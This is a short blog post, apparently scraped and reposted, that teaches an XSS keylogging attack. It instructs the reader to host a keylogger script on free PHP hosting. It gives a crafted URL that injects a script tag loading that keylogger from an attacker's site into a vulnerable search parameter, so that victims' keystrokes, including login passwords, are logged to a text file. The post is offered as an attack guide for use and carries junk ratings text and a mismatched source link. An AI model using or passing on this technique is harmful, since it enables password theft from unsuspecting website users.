As the name suggest, It only works on the website that are XSS vulnerable. As we know that we can run our own scripts on those website which have XSS vulnerability. We use our Keylogging script on XSS vulnerable website.
For this attack we need three things:
Kelogging script.
XSS vulnerable website
A webhosting
First of all download Keylogging script from Here:
DOWNLOAD
Now create an account in any free hosting web host that supports PHP. PHP will be used to write keystrokes on a text file.
Now open Logger.js and change the URL of your script. Default URL is http://yourwebsite.com
Change it to your hosting URL.
Now host all these scripts on your web host.
Now find a XSS vulnerable website website and include script link like this:
http://targetwebsite.com/search.php?q="<script src="http://yourwebsite.com/keylogger.js"></script>
Now if someone clicks on that link everything they type in on that page will go to the data.txt file. This script will capture all the keystroke and save it to the file with the help of PHP script.
If a website's login page is vulnerable to XSS attack, this script can be used to grab passwords.
100 out of 100 based on 43765535 ratings. 43765535 user reviews.
noreply@blogger.com (Praditya Nugroho) 27 Oct, 2012
-
Source: http://tenoctave.blogspot.com/2012/10/free-download-software-pc-gratis.html
--
Manage subscription | Powered by rssforward.com
0 komentar:
Posting Komentar